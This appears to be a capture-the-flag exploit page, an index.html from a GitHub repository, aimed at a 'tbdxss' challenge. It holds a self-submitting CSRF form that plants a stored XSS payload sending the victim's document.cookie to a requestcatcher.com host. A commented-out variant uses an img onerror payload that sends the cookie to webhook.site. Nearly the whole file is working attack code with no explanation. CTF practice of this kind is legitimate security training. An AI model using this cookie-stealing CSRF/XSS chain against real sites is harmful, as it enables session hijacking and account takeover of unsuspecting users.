-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathindex.html
31 lines (27 loc) · 1.15 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
</head>
<body>
<form method="POST" id="myform" name="myform" action="https://tbdxss.chal.perfect.blue/change_note">
<input type="text" name="data"
value="<script>window.location=`https://ksflkajfklsdjflksjdflk.requestcatcher.com/cookie?c=${document.cookie}`</script>"></input>
<input type="submit"></submit>
</form>
<script>
window.open = "https://tbdxss.chal.perfect.blue/note";
setTimeout(function () { document.myform.submit(); }, 1000);
</script>
</body>
</html>
<!-- // fetch("https://tbdxss.chal.perfect.blue/change_note", { -->
<!-- // method: "post", -->
<!-- // window.location = "https://tbdxss.chal.perfect.blue/note"; -->
<!-- // headers: { -->
<!-- // "Content-Type": "multipart/form-data" -->
<!-- // }, -->
<!-- // data: { -->
<!-- // "data":"<img src=x onerror='window.location=`https://webhook.site/ca3953ff-ff57-486b-b6b6-8f54aea3f953?c=${document.cookie}`'>" -->
<!-- // } -->
<!-- // }); -->